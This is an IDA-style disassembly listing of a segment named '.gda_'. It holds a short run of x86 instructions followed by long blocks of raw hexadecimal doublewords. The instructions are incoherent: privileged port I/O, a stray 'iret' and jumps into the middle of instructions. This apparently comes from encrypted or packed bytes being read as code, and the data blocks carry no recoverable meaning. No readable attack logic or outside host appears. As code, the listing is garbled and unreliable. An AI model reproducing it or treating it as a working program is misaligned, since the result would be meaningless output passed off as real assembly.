		das
		mov	eax, 73068DFFh
		push	esi
		js	short loc_31432261
		push	0B715DCFh
		and	[eax], bh
		rcl	ch, 1
		lodsd
		lea	eax, [esi+48DE1C8h]


loc_3143225C:				; CODE XREF: .gda_:3143229Fj
		xlat
		cmc
		mov	[edi-42h], cl


loc_31432261:				; CODE XREF: .gda_:3143224Aj
		mov	al, ds:15C55D46h
		db	2Eh
		xor	bh, al
		in	eax, 0FCh	; AT 80287 data.
					; 286 sends opcodes & operands and receives results.
		test	[esi-7408CC40h], ebx
		test	[ebp+eax*2+3398805Eh], edi
		insd
		xchg	eax, esp
		in	eax, dx
		sub	es:[eax-25h], al
		aad	0F0h		; CODE XREF: .gda_:314322BAj
		mov	ch, 8Eh
		shr	al, 1
		cmp	dword ptr [ebp+78565D4Ch], 0FFFFFF90h
		inc	dword ptr [esi]
		pop	ebp
		and	bl, [edx]
		push	ss
		cmp	[ecx-1Fh], dl
		xor	eax, 0E0FE8BA2h
		jnz	short loc_31432241
		fcom	dword ptr [ebp+6Eh]
		jo	short loc_3143225C
		imul	esi, ds:2E3BAE6Dh, 9040F930h
		sbb	ebp, [ebx-8502740h]
		mov	ch, 0BEh
		imul	ebx, [esi-80h],	59h
		pop	eax
		xlat
		out	dx, eax
		jl	short near ptr loc_3143227F+1
		sub	[eax+58h], al
		sti
		iret
; ---------------------------------------------------------------------------
		db 0B4h, 0D2h, 90h
		dd 3070C3EBh, 19706058h, 0C6E3FE2Dh, 3FC84808h,	0B0F28068h
		dd 2B467537h, 0B0DD401Eh, 0D2562487h, 0BD8F00E8h, 0A66860FDh
		dd 49374BA8h, 50382BF4h, 0A0986DE9h, 8575E0FEh,	706E527Ah
		dd 3247057Bh, 0BB38EC6Bh, 0A3700AB4h, 65559968h, 500E3B31h
		dd 4C132B9Bh, 0EEE8B741h, 180F5C6Fh, 0D0B9A08Bh, 0B269517h
		dd 54FB607Eh, 0FF184588h, 503ABF8Ch, 0B0F21768h, 1090E1A2h
		dd 18D8402Ch, 0D0B9A088h, 0B269517h, 50FD607Eh,	0F25A44A7h
		dd 50522008h, 0B098E838h, 1092E0CCh, 2754A8E9h,	0B8E8A1E2h
		dd 301900E9h, 0AB46F5B7h, 0FAB0C09Eh, 0AF382108h, 86A3BEFDh
		dd 10FD08C8h, 21B14028h, 0BAB8A08Ah, 3AFB59E8h,	5876A22h
		dd 0F0EEFB1Ah, 0D3FBD1E3h, 86A3DED5h, 94F7E0C8h, 7058421Ch
		dd 0D0B8A660h, 744C4EE8h, 6F782C04h, 0C6E3BA3Dh, 9A8DAD08h
		dd 8398B67Fh, 0D6456D01h, 0C1587613h, 0A3503386h, 0B31800EAh
		dd 0A6439AF5h, 74D7C0A8h, 50382208h, 8B5205E3h,	6007E0FEh
		dd 92DDCF29h, 5BB896BFh, 623E26Dh, 91089F48h, 0C8F74527h
		dd 0D5B3203Eh, 0B0AEBBA6h, 9FF99037h, 466076ADh, 2352B88h
		dd 0D31836D3h, 91099F52h, 0C89B4527h, 0DDB3203Eh, 0B0AEBBB2h
		dd 6107E92Bh, 20DDCF29h, 38B896B0h, 30180150h, 0AC28DDC5h
		dd 3F53C09Eh, 89CE2062h, 339CF097h, 5092E329h, 1A0FB92Bh
		dd 5DA0CA88h, 60DD75Dh,	9061D948h, 0F455C0A8h, 0AFC7DE45h
		dd 3D33E697h, 10F8ADCCh, 0DB3E4028h, 7BBCE705h,	0A595E4DAh
		dd 904E5AB4h, 0F251A604h, 92BB8B6Eh, 3B6D626Ah,	78F88A1Ch
		dd 70582FD8h, 0D0D26C03h, 3072C463h, 90786020h,	0A198AAA0h
		dd 364A5Ah, 8B4E1597h, 93A0E0FEh, 803000ECh, 5BB8A0E7h
		dd 0BB186A3Ch, 0FA380A84h, 0A2DAAAA8h, 0A0502062h, 0DA988007h
		dd 0EF92B1C8h, 0AECDBF78h, 8FB896B3h, 3FE785B1h, 907967CCh
		dd 0F06D4DA8h, 0E9381618h, 0B0988B94h, 0B50B0F43h, 6058ADA9h
		dd 5535A0BEh, 302E14D0h, 0C42880B7h, 0FB2E0C2h,	6BDEB5F7h
		dd 701D805Eh, 0F8CC9597h, 70584165h, 0D0B8B160h, 747D53E8h
		dd 0F70D022Dh, 86B1B2F8h, 375D4C61h, 58CF800Dh,	10F8E586h
		dd 4F0CF5D7h, 4547A0BEh, 302E3B82h, 0BEED9F1Fh,	9AD8F693h
		dd 0AF3A4A08h, 86A3DEFDh, 11D059C8h, 5BCF4028h,	0F4B42969h
		dd 0A5E757BCh, 904E5BEAh, 555B369Bh, 500E1C36h,	4FCFD468h
		dd 26C3465Dh, 498C528h,	2E3BE6EEh, 0CFF672ECh, 0FA70443Ch
		dd 0FF2AAA8h, 6603BE9Dh, 0C4580568h, 96107314h,	4358402Dh
		dd 0EA5B3141h, 0C2685D1h, 0A20D607Eh, 0D4FCBC29h, 234A536Bh
		dd 7119A81Ch, 10F8EE5Ch, 26081478h, 83E8F0D9h, 0B4E9517h
		dd 50FD607Eh, 0FD7B4F1h, 0DF30047Ch, 86A4BEEDh,	0ED3D08C8h
		dd 8F0BBFD7h, 0E6838E1Dh, 0B196EBE8h, 9079488Ch, 652797A8h
		dd 500E1B26h, 8BB61597h, 7811E0FEh, 70A7BFD3h, 0BAB8CAD2h
		dd 5A186AE8h, 90790848h, 3453C0ACh, 3A682062h, 4F5C0B64h
		dd 4F80B62Ah, 4358401Ch, 2F624841h, 0A595FF17h,	904E750Fh
		dd 0A08991FAh, 6B0AB5F7h, 741B805Eh, 48A023E8h,	5FA84070h
		dd 0DEE7A088h, 301900E8h, 90786048h, 0F0D8C0A8h, 78B32008h
		dd 0B0988068h, 46A9E0C8h, 4ACDBF7Bh, 7BB896B3h,	0F09CACB1h
		dd 7E9A9B3Dh, 814D4D6Bh, 2381611h, 8B0A1597h, 9571E0FEh
		dd 706E7F7Ch, 0D0B8B660h, 5F774CE8h, 0C0081523h, 99AEA9DAh
		dd 355F4564h, 0C5F4E13Eh, 40F8A1ADh, 4B62D5D7h,	5531A0BEh
		dd 302E3FB0h, 0F13A3C8Bh, 9196A5DBh, 1F5C4565h,	0D3FDEA0Ah
		dd 46A493BCh, 133D135Ch, 0A3D4A0FCh, 5574729Ch,	0E23B6026h
		dd 95ACA1CDh, 3554494Eh, 0C2DB8029h, 758C81ADh,	1534296Eh
		dd 0A0C8C1C5h, 717F6E81h, 0F50A2348h, 0A0BDB4C9h, 355B4F7Ah
		dd 0B0D9F31Bh, 719D928Bh, 150A255Ch, 0B5CCCFE5h, 556A68BCh
		dd 0D3780429h, 84B9A5DAh, 2250746Dh, 0B0FCE10Dh, 719D928Bh
		dd 1F0C255Ch, 0B5D0CCE7h, 22B7084h, 0E0190E1Bh,	84B7A8DBh
		dd 39406508h, 0C2F0D41Ch, 109C81ADh, 1534296Eh,	0B5D5C9DCh
		dd 494B6FBCh, 0FD1D143Bh, 95B5A9FCh, 354A6608h,	0D2F1CC0Dh
		dd 698A81BAh, 43D0728h,	0B5D4C9CEh, 426C74A9h, 0E40D0221h
		dd 0F099B3CDh, 164C454Fh, 0E3FDEC01h, 109D9AA1h, 362C256Fh
		dd 84DDCCE1h, 307D6D81h, 0DD0C050Fh, 9CADA4C7h,	3E59686Dh
		dd 0F1FDEC0Ch, 649DA7C8h, 35257Ch, 0B5D4C9CEh, 557561A6h
		dd 0F53F6009h, 9DBD94DCh, 24597078h, 0F798C100h, 75AE94ADh
		dd 1F31335Ah, 0B5FFA0E6h, 427D569Ch, 0FE17093Bh, 0F099B8EDh
		dd 64C454Fh, 0DDEDEC07h, 7696A9ADh, 11353247h, 0BED7C9FCh
		dd 5F5400A9h, 0F9340429h, 82B9B2CAh, 1D386171h,	0D9CEF009h
		dd 76B797ADh, 1534296Eh, 0B5C8EF88h, 5C714686h,	0E0192D2Dh
		dd 97B6A9D8h, 20772049h, 0C2C8EE0Dh, 639D83A7h,	208405Bh
		dd 0A3DDC3E7h, 762A339Bh, 0E40B1221h, 9FAA90A8h, 234B456Bh
		dd 0D5D6B25Bh, 43F894B0h, 191E344Dh, 0A4F9C5E4h, 5271729Ch
		dd 0E31D143Dh, 958BC0E9h, 3C51667Ch, 0DDF1D40Dh, 7CABE0ADh
		dd 7028254Dh, 0A4CBD9DBh, 594C6D8Dh, 0FF2C0525h, 95B4A9EEh
		dd 3555495Ch, 0DDF6D568h, 79AE90A9h, 1617374Dh,	0B5D4C9CEh
		dd 427156E8h, 0FC19153Ch, 9FB4ACE9h, 226F206Bh,	0F6FDF401h
		dd 109D8CA1h, 14193466h, 0A4CBD5E2h, 467172B8h,	0F71D0C21h
		dd 9F8CB3CDh, 50564563h, 0C2DBF426h, 758C81ADh,	1534296Eh
		dd 93CCEE88h, 4479659Ah, 0FF0A302Dh, 83ABA5CBh,	134C6E08h
		dd 0C4F9E51Ah, 7F8AB0ADh, 32B254Bh, 9EB8D8CDh, 556A439Ch
		dd 0C31D1429h, 99ACA3CDh, 1E384E67h, 0D5EAC31Ch, 459D94A9h
		dd 202A255Bh, 0B5DBCFFAh, 7E18739Bh, 0E0192D3Ch, 87BDA9FEh
		dd 356B4647h, 0DFF1F40Bh, 64B6E0A6h, 1E3D3067h,	0B5D4C9CEh
		dd 7F6C4EE8h, 0C0160538h, 95BBAFDAh, 3F6C537Bh,	0B0F6E503h
		dd 60B79486h, 150B2E4Dh, 0BFD1D4EBh, 44560086h,	0E4171218h
		dd 0A6ACA3CDh, 254C5261h, 0D5D5EC09h, 698A8FA5h, 212C0E28h
		dd 0A9CAC5FDh, 5F7E6EA1h, 0E4190D3Ah, 0A4B6AFC1h, 3E5D4B67h
		dd 0E7ECCE68h, 758C89BAh, 42A297Eh, 9DD4C1FDh, 42776D8Dh
		dd 0E42A6031h, 99B695C4h, 355C4F6Bh, 0D9EAF43Bh, 7FAC87A6h
		dd 192B2E69h, 0B9CAD4DBh, 67186786h, 0E42B211Bh, 85ACB2C9h
		dd 3C5B2078h, 0C3FDF307h, 759383A7h, 1F3B405Ch,	0B3DDCEE6h
		dd 557F009Ch, 0E317083Ch, 9EA1A2DCh, 505D4D69h,	0C6FBE51Ah
		dd 7E9D93C8h, 1F2B404Ch, 0A4DDCBEBh, 447649E8h,	0F516122Dh
		dd 9FB483DCh, 3170457Bh, 0D5F4E406h, 6496A9C8h,	1536324Dh
		dd 0A4DDE7FCh, 5E766FABh, 0F50C032Dh, 91AC93CCh, 1938457Ch
		dd 0C2FDF406h, 5F8C85A6h, 31362558h, 0A4D6E988h, 5576728Dh
		dd 0F5082F3Ch, 9CAA95C6h, 3E712049h, 0DEEAE51Ch, 75AA94ADh
		dd 191E2449h, 91B8C5E4h, 605956ACh, 0BE4A5301h,	0F0948CECh
		dd 135F455Ah, 0D5EBEF04h, 10818583h, 3F3F257Ah,	9BD6C5F8h
		dd 485D798Dh, 0F52A6009h, 95AD91CFh, 316E597Ah,	0F5FDF504h
		dd 42F8A1B0h, 150B274Dh, 0BCD9F6FCh, 485D659Dh,	0A32E6009h
		dd 0A6DAAA5Eh, 3AECAB5Eh, 0C267D269h, 8507B6D0h, 706E7F70h
		dd 86EE6403h, 0CF4E50BEh, 5877838h, 0F0EEFB6Eh,	0E28E48Bh
		dd 3D9888AAh, 0D8D31B81h, 70582879h, 9C354888h,	307203CCh
		dd 0C0296522h, 7BDDAAFBh, 84B370C4h, 0F0F2D438h, 0EFABB299h
		dd 4663AEBDh, 0DC7C2388h
		dd 0BEE9517h, 54FB607Eh, 655503A0h, 500E1AF4h, 0B0F2495Bh
		dd 10C8889Ah, 0B4D3401Ah, 90D2F1D9h, 287251B8h,	0C470A0CBh
		dd 0F88CEC2h, 6603CA9Dh, 905C0368h, 0D07D32FBh,	879AD927h
		dd 129BF852h, 0CF2B572Bh, 6F87A1A0h, 555CCF57h,	382008h
		dd 0B0F77000h, 7A2C6BC8h, 1A94CB28h, 0D0B8C8C8h, 327200F8h
		dd 0F8780A1Ah, 0F0D8AF58h, 3692062h, 6E0D7F38h,	4FF8D6F3h
		dd 5ECDBF71h, 55B896B3h, 0BB697417h, 0A66D1CC5h, 7DD423A8h
		dd 6628209Dh, 0E7498368h, 9B2A1F9Bh, 46638AADh,	31372D88h
		dd 0D81800CFh, 6F879F63h, 0CB3A4523h, 0DFB5203Eh, 0B098A846h
		dd 0EF07FA20h, 0BEDDCBD7h, 5DB896B3h, 30303567h, 6F718848h
		dd 75533F57h, 500E1BDAh, 90EC40EDh, 38BA6F45h, 84B04028h
		dd 5B475F76h, 623DA6Dh,	0E4B8E548h, 0BF574DA3h,	0B8382020h
		dd 4F677EB7h, 0D3A72743h, 7058A87Dh, 51E5A088h,	6031005h
		dd 1DB15348h, 0C6C6542Dh, 16C7108h, 0E1C9D039h,	2BA27537h
		dd 74DF401Eh, 0FE2D5FACh, 6D1836D3h, 0C578648Ah, 0F0D8C040h
		dd 0BDB97D08h, 0B0AE9B57h, 85751FA2h, 706E5B22h, 0F075F2D8h
		dd 303200CCh, 0F674A4CBh, 0EB88456Fh, 70F5203Eh, 0ABCA05AFh
		dd 10DCE0FEh, 0B3054002h, 38E0BAE2h, 301800E1h,	3A1922C5h
		dd 0AD0956h, 18AD49CBh,	0B598B654h, 52F0E84Ch, 4C10D5A1h
		dd 324FA0BEh, 30F0552Bh, 0CD786048h, 0EB412D29h, 0CDB3203Eh
		dd 0B0AEBC24h, 18DC9C4Bh, 0C9DC4F28h, 51B8A088h, 301A0804h
		dd 94103448h, 0FD8C0A9h, 6603A29Dh, 3D640B68h, 11FCC44Ch
		dd 1A084028h, 0D0BC4888h, 624E00E8h, 6F2F601Ah,	0C6E3BE3Dh
		dd 0DDF11308h, 0B09984FFh, 7AA9B1C8h, 7132112Ah, 0D0B8A0E0h
		dd 0A5E752A8h, 904E5B02h, 842E453Eh, 386C7053h,	0B098816Ch
		dd 344C1F9Fh, 70584208h, 0EC923577h, 0B54100DEh, 736E1488h
		dd 245390BCh, 16A2062h,	2567D63Fh, 10CEDB0Ah, 598C571h
		dd 4547F658h, 302E3BC6h, 0C23C37C5h, 0A89CAAFFh, 513CB785h
		dd 83338068h, 49E88A08h, 2008EBDBh, 80E8F0D8h, 0A5E752B8h
		dd 904E5B1Ah, 0F2D00429h, 24C72008h, 2567884Ch,	10CEDCD2h
		dd 6ACDBF7Bh, 8DB896B4h, 0B018042Ah, 910D6A76h,	88554BEEh
		dd 0B338161Dh, 0B00D0D71h, 13F8D6D8h, 0A2A716F9h, 58B7600Ch
		dd 301801F7h, 9168E447h, 0CE58C0A8h, 16285532h,	0BF98BEE8h
		dd 10F9E14Ch, 5066C028h, 51FE51FDh, 7E5150D6h, 1B3A150Fh
		dd 0F19E0667h, 1F60B47h, 0E6C98002h, 26D1F9Bh, 29587614h
		dd 55B761B3h, 30180037h, 8EF0E5C5h, 0F0B2C09Eh,	50382C60h
		dd 4FCBD068h, 26C4F25Dh, 70547D28h, 55B7A088h, 30180057h
		dd 9078D1A1h, 0A0E641A8h, 5F6E695Ah, 0B09825EDh, 183E63C8h
		dd 7F557C84h, 0D0B8390Ch, 45383CE8h, 0AA44CCBBh, 0F05445A7h
		dd 5D952008h, 90B8A048h, 759FC1F5h, 0DC27355Ch,	0ACCD80B4h
		dd 10E77E69h, 0E50C1420h, 0F3A641D9h, 7F171A78h, 0F75EE81Dh
		dd 21F7E037h, 707F5092h, 825A5788h, 0BAA9517h, 504B607Eh
		dd 0A08890F8h, 503829E0h, 0C7F7C468h, 71978CA6h, 0E5A7404Ch
		dd 0D08E9CAAh, 66CC06Dh, 15F1A97Bh, 0F0EEFCE4h,	52384859h
		dd 0E1C90068h, 8507B09Eh, 706E7C0Eh, 0CB2B3505h, 34800DEh
		dd 0C0293481h, 0F8991FAh, 66037A9Dh, 949C0768h,	2BD67537h
		dd 0B3A0401Eh, 0C5D32D08h, 0C91900DEh, 0FA790A8Bh, 0FEB3FA9h
		dd 45C7247Bh, 0EAEC40EDh, 0C0733BFBh, 205B4B9Bh, 670D2DB4h
		dd 0BB1836F5h, 90796CF2h, 0F8524BA8h, 53382009h, 0D053AB90h
		dd 0B60B2B43h, 375D3449h, 0FE53556Ah, 6317C76Bh, 1B2FACC3h
		dd 9A8C907Ch, 3A6A7148h, 5E0D7F97h, 9BF8D6F3h, 466322A5h
		dd 0DC7C2388h, 0D99BCFC3h, 0FA7FA74Fh, 79D828A8h, 3FB2347h
		dd 0E7CCC627h, 4CBDB289h, 23B2965h, 0B6D7D3E7h,	594F5C9Ch
		dd 0E7170426h, 859B9CDBh, 3E5D527Ah, 0C2FDD61Ch, 7E9789BBh
		dd 200574h, 0B5CACFE4h,	514C009Ah, 0E41D073Ah, 84ABAFE0h
		dd 50382208h, 0B098FF38h, 738A89C9h, 19226E4Ch,	0A096C6EDh
		dd 79560084h, 0F7582B0Bh, 9ABDA5CFh, 5A55436Bh,	0E2DDD33Dh
		dd 5FB295E8h, 56780E61h, 0A4CAC9FEh, 0D84D0A9Dh, 90786048h
		dd 6A3541F5h, 96381616h, 868DEBEDh, 8507E0C8h, 706E7BAEh
		dd 0A4A74849h, 0BB066AD4h, 0A6435EFDh, 0CC7499A8h, 36125526h
		dd 0AD67BEE9h, 0AD75C3BDh, 706E7C6Ah, 87BAD603h, 0BDBD664Dh
		dd 0A64FD7CDh, 2D5D4FA8h, 0AA38163Fh, 3C62C6E1h, 0A1031E86h
		dd 9B97A229h, 2B9048D8h, 4C9BFF17h, 0E57C686Ch,	0F0D028ECh
		dd 166B2008h, 0FCDCAE2Bh, 8507E084h, 706E7BBAh,	0DDCC6083h
		dd 631A6A7Bh, 0AB42F5B7h, 2027C09Eh, 0AEA6C89Bh, 0BB707F97h
		dd 43F8E0C8h, 3F07036Eh, 9CFC8EDBh, 0A5E700A4h,	904E5BDAh
		dd 0F264340h, 0A631C8F7h, 3D677F97h, 10CEF21Ah,	0F5D5891Bh
		dd 0D08E9F64h, 614951B9h, 0C1293118h, 0CB565557h, 5BD0203Eh
		dd 0E5988068h, 23AAA59Bh, 3C1C6E1Ah, 4547A0C4h,	302E3B7Ah
		dd 90786AA0h, 80ABB7A8h, 2456497Ah, 0E098C10Eh,	2BC27537h
		dd 0F5D1401Eh, 0D08E9BCAh, 0BD9531E7h, 904E7939h, 0CC904521h
		dd 0AF69203Eh, 86A312FDh, 149073C8h, 0FD584028h, 0E6A1DE3Dh
		dd 8D9559E8h, 904E5C66h, 0F2D0940h, 0D5FF46F7h,	0B0AE9E09h
		dd 0B57BB0C8h, 706E5E4Bh, 0F12D2D88h, 601836F6h, 0FA790A1Ch
		dd 0F2B092A8h, 0AFB82008h, 86A4B2FDh, 4A3865C8h, 0FDD5625Dh
		dd 0D08EBEDCh, 0BD1E6ABAh, 0A66601FDh, 0A08E94A8h, 0AF6A7158h
		dd 86A4B6FDh, 8507B8C8h, 706E7C06h, 0EEF7254Eh,	0D81800DEh
		dd 90786044h, 0B39793FFh, 7E0A1343h, 0B0D4CC2Ch, 2B6A7537h
		dd 18CB401Eh, 0D0B8A08Fh, 28CDB565h, 1D21607Eh,	0C6E33E15h
		dd 0A57CC808h, 0BC707F97h, 47F8E0C8h, 3E110E61h, 9496F4CDh
		dd 0CF184CA4h, 0A643F2DDh, 0FF1845A8h, 503A158Ch, 0B5F01368h
		dd 9DF8E0C8h, 4641539Dh, 6D35F988h, 302E3CF2h, 6F8D6DA0h
		dd 0EE654357h, 50381634h, 0B2880467h, 0FC79E0C8h, 705841B8h
		dd 0D1B9C8DCh, 0A5E700E8h, 904E5BB6h, 0F1480429h, 0DB682008h
		dd 0E298EABCh, 2CE67537h, 0B0DD401Eh, 0B8B5D5D1h, 30181360h
		dd 0ABCAF5B7h, 1233C09Eh, 4E5B9D8Bh, 0C598805Eh, 777D6DE1h
		dd 20587636h, 0ECB23577h, 0F09D00DEh, 91F1E447h, 0B053C0A8h
		dd 0AF38AB04h, 0D31D0F58h, 0D6F8D6D6h, 46660FADh, 0D0D2A188h
		dd 32720182h, 0AC6EF5B7h, 85BC09Eh, 30BC2FF7h, 23988069h
		dd 0EA77545h, 6032401Eh, 4547F3DAh, 302E3CEEh, 1577A0CDh
		dd 0F0D8C1E8h, 4E419D85h, 0B829805Eh, 0EF02A320h, 70CC28D7h
		dd 0FBE6A088h, 142C890Eh, 1AED9F1Ch, 7DD8F693h,	6626A7B5h
		dd 58993168h, 0EF071AECh, 6E2CD5A5h, 0D0D2A0BEh, 30181480h
		dd 6F2B3248h, 0C6E4D23Dh, 747CAD08h, 5C0D0D7Ch,	40F8D6F7h
		dd 0FB52F627h, 11AC84CCh, 7A1A0808h, 92327249h,	0FBDB8ABAh
		dd 0D030044Ch, 50598F89h, 54F3B1C0h, 42A7500Ch,	80052DD8h
		dd 0D81836D4h, 90786054h, 88EEEE8Dh, 7E180E28h,	95BDBA48h
		dd 68C0CEEDh, 5578380Dh, 9FF2AAFBh, 30384EA1h, 0D2ED9F1Fh
		dd 71D8F693h, 50388CCCh, 0E098EA68h, 8507B39Fh,	706E7C3Ah
		dd 0C53C2D03h, 307200DEh, 59137BABh, 0F53091A5h, 76382008h
		dd 0B092E44Dh, 526D1F9Fh, 0F3587613h, 3BE8AC4Ch, 301F68E3h
		dd 2DF56048h, 0F0EEDE25h, 0C5C7735Fh, 0B0AEBC7Ah, 4486204Dh
		dd 4C08F5A5h, 753BA0BEh
		dd 302E156Ch, 0DFF5ED48h, 0DBD8F696h, 1384AC6h,	2567D33Eh
		dd 10CEDCC6h, 0E58B8ABh, 2E3331A7h, 0C48B565h, 9DC8607Eh
		dd 0E0AD6E5Ah, 0AA09C868h, 0C2F97F97h, 9DF103DFh, 9AB3415Fh
		dd 1E936F03h, 0C48BD65h, 348B607Eh, 4933372Fh, 52ADDF5Bh
		dd 3098B654h, 26ED8B75h, 5A2C4128h, 0D0CD90E0h,	828DFFE8h
		dd 10785673h, 0C6E68F15h, 414C2008h, 0AEFB05AFh, 10F8E0FEh
		dd 0F59E4028h, 0D08E9EC7h, 0CE10E9E8h, 15BF9FB7h, 0F0EED5DCh
		dd 0D0382008h, 0B09C4235h, 30B7EAC5h, 1E372F46h, 0F0DECFA8h
		dd 557E6984h, 0B0374069h, 95B5A9DCh, 70575428h,	0D5F4E50Bh
		dd 649992AAh, 7A55614Dh, 0F09880A8h, 43384FC8h,	0F5150D3Dh
		dd 91BFE0DAh, 3E5D447Ah, 0E2928D49h, 7E9D8CADh,	33D2C5Ch
		dd 0F0C1CCFBh, 40686180h, 0FE194031h, 88BDE0CCh, 245B4578h
		dd 9CECEE09h, 718C93E8h, 1E312446h, 0FD989AEFh,	514F0AE5h
		dd 0F910033Ch, 91F8A7C6h, 34184C64h, 0D1B8F909h, 7ED884A6h
		dd 4302741h, 0BFDE80A4h, 427E209Ah, 0F4160521h,	0D091E0DBh
		dd 2451417Fh, 0E7928D52h, 758A85A0h, 152A2108h,	0A5D7D9A8h
		dd 427E20C4h, 0F4160521h, 0B3F8FFDBh, 715D4D67h, 90ECC948h
		dd 64D893A1h, 513D2D41h, 0F7CCE9A8h, 5174209Bh,	9459053Ch
		dd 0B8E8072Ch, 0C978175Ah, 994305E3h, 4E846DCh,	98E50029h
		dd 3BF23Ah, 67523B15h, 242CB11h, 0C001A455h, 75584EE7h
		dd 0C139B506h, 10238915h, 70584028h, 0D0B8A088h, 301800E8h
		dd 90786048h, 0F0D8C0A8h, 50382008h, 0B0988068h, 10F8E0C8h
		dd 70584028h, 0D0B8A088h, 301800E8h, 90786048h,	0F0D8C0A8h
		dd 50382008h, 0B0988068h, 10F8E0C8h, 70584028h,	0D0B8A088h
		dd 301800E8h, 0F0786048h, 0CF64652Bh, 0D338203Eh, 86A740CDh
		dd 0A7F7E0C8h, 23D5546Bh, 9B0FAF90h, 0BBC803EEh, 0BB5C440Ch
		dd 0E9AACCEAh, 23306233h, 0A4DA0B7Ch, 99F4A2E3h, 4667FCBDh
		dd 103D2988h, 0DB1836D7h, 0B8BAE34Dh, 32B9194Ah, 0D5B0200Ch
		dd 0B0AEA424h, 10F88420h, 70472828h, 5535A088h,	302E2391h
		dd 0E4605911h, 0F41843A4h, 0D5C7D7EAh, 0B0AEBFF4h, 1321170Bh
		dd 467C0CA5h, 2FA84388h, 3097FC98h, 727C88CBh, 8945495Eh
		dd 0D338162Bh, 0B5EC8052h, 62FBD2E3h, 8C16CD38h, 53E6FBD0h
		dd 346C00D2h, 939352B7h, 18C8B257h, 0AFC7DF5Fh,	3DB34E43h
		dd 10CEDF08h, 44134370h, 703D2F4Bh, 0F71836D7h,	0A647FCCDh
		dd 0F0D8C0A8h, 5004C808h, 35138068h, 10CEDF54h,	8FAEF0C0h
		dd 0D0A04877h, 8D9B00E8h, 904E5FD4h, 79D0B5A8h,	661BD595h
		dd 4F046B68h, 26C77C45h, 0F5D78328h, 0D08E9F28h, 0F849561h
		dd 9390607Eh, 0C3D8C0A8h, 0C3B3E3C1h, 0B09880E8h, 0EE15089Ah
		dd 0E55BBFD7h, 0D08E9F48h, 4A9BD6EBh, 14776044h, 0F0D8C1AFh
		dd 50285A8Bh, 0B0650467h, 5273E0C8h, 0B8B01024h, 0D3475F76h
		dd 627C06Dh, 0C0BE6348h, 958C822h, 0D0215408h, 0B3ECAE91h
		dd 9B090B88h, 91D94160h, 0F677F57h, 7C5CF969h, 7C0D6004h
		dd 7310EBF1h, 0DF37DAF1h, 0B09880DFh, 0EE8061AEh, 0F557721Bh
		dd 0D0B8A023h, 302283BEh, 0DAF3653Dh, 7BDA2BB8h, 1C92302h
		dd 4F66F280h, 0D04DE337h, 0DD587617h, 2BC0600Dh, 309C84E7h
		dd 25876048h, 0F0EEFF68h, 0AE6DC858h, 359B7F97h, 10CEDF08h
		dd 4F98C5A7h, 0D4BBA0BEh, 0F09B53CCh, 9FA3534Ah, 0E23BC81Eh
		dd 318E988h, 0B4BCA4A9h, 39DCFCE1h, 30036424h, 2B394963h
		dd 0EDA3D7E7h, 6BF95E3Ch, 2BB68500h, 0ABB9167Ch, 4F39BB31h
		dd 0EB79CEBCh, 0DCED62FEh, 2B3986FCh, 0C340E97Bh, 6BF97E3Ch
		dd 38029D5h, 0ABB9367Ch, 51BDBF2Eh, 0EB79EEBCh,	917D7F18h
		dd 4547A6FCh, 302E3F48h, 6F098913h, 73863F57h, 0BFD134CAh
		dd 73677F96h, 48FC8ACAh, 8FAD10C0h, 0F62D2877h,	561836CEh
		dd 926051F0h, 0F33C004Ah, 0FB5EC20Ah, 58C08602h, 0EF0715FDh
		dd 0F75082ABh, 88BDCA59h, 0CFED2800h, 9382E0B7h, 0A068CBDBh
		dd 761EA50Ah, 5B32805Eh, 48908AEFh, 73A2C082h, 0C108B8FDh
		dd 0CFED0800h, 9079D8B7h, 225CC0A8h, 0B0E92D7Ch, 46734A96h
		dd 1040E523h, 0DBD84028h, 5D7B1F6Ah, 620987Dh, 67AF4B48h
		dd 752F0372h, 500E1883h, 0B8988068h, 0D13875C7h, 0F5AE4BC8h
		dd 0D08E9801h, 561E75E9h, 7B5DE945h, 795D36BBh,	52381630h
		dd 0BDFE861Dh, 1413C5F9h, 55594D4Eh, 6C500BEEh,	0BBE7FF17h
		dd 5F1540Bh, 0F0EEFF1Ch, 0D5CFE3A3h, 0B0AEB8E3h, 18F8E0C8h
		dd 7498D527h, 4C500A34h, 0B9E7FF17h, 0A647D8DDh, 795D36A8h
		dd 51381630h, 8197841Dh, 0D0D3E223h, 0F5AF8383h, 0D08E9803h
		dd 381800E8h, 15F2473Ch, 0F0EEF82Dh, 3633C0C9h,	0D6DD0B65h
		dd 0BA005063h, 48DDC5A2h, 3079A0BEh, 547F05F3h,	0A3D366C1h
		dd 1B73A668h, 0DF5C981Ah, 3A33806Dh, 26C0654Dh,	0B1004428h
		dd 1313B868h, 10F3FC58h, 9093D82Eh, 0E9336BCEh,	0B8602462h
		dd 4F677471h, 0D12AE445h, 753E48C8h, 7BDE6001h,	0A0A80303h
		dd 0C87A0AE2h, 0F2CC040h, 24EAA4F7h, 0E890EA5Ah, 0EF0B1420h
		dd 292BED7h, 2E7DD44Bh,	0CED17422h, 6EA31482h, 0ED4B462h
		dd 0AE3454C2h, 94F4A2h,	0A0350B31h, 0C091ABD5h,	607D4B7Dh
		dd 0F3D9EB10h, 0A8E0DDC5h, 752FC09Eh, 500E1883h, 30988068h
		dd 7048E3BCh, 0FBDDB782h, 0D0B896B0h, 441000E8h, 1B2DD84Fh
		dd 0BF73C044h, 68B3A5FFh, 0B09B805Eh, 94F7E1C8h, 705840FFh
		dd 7B124838h, 0FBCBD61h, 78C8607Eh, 4D516B02h, 500E1FA0h
		dd 8813059Fh, 10FBE0FEh, 652C4028h, 0E833257Fh,	301800DEh
		dd 950C6148h, 0F260140h, 0FAD190F7h, 141D0BC3h,	9BF8D6F7h
		dd 0F9906BE7h, 0E6870C35h, 0CC5089E8h, 6F1C07F0h, 30EB6B9Eh
		dd 0D5CF8B6Eh, 0B0AEB8E3h, 10F8E0CBh, 0F5AE4E5Ch, 0D08E9801h
		dd 0D81D7468h, 6F879E0Ah, 79BCA710h, 900B8B2Eh,	356F2B0Eh
		dd 10CED843h, 7058402Bh, 554EF5FCh, 302E3861h, 787D15C8h
		dd 0F273EB6h, 0AFC584E0h, 58B83097h, 0EF071B7Eh, 0C83E79CBh
		dd 7BDEB577h, 0A593AB79h, 904E58C3h, 322F125Fh,	5038200Bh
		dd 0CE70941Dh, 0A0071F35h, 8BC8A837h, 68DE5F77h, 9B7E1517h
		dd 5FF3CBD9h, 0CF744523h, 9813203Eh, 4764C8E1h,	26C06B4Dh
		dd 70584328h, 2796D488h, 6208B6Dh, 90786048h, 7FAB4AEh
		dd 6600AB8Dh, 0B0988068h, 0F8FD95C9h, 8FA7BDDAh, 0E833257Fh
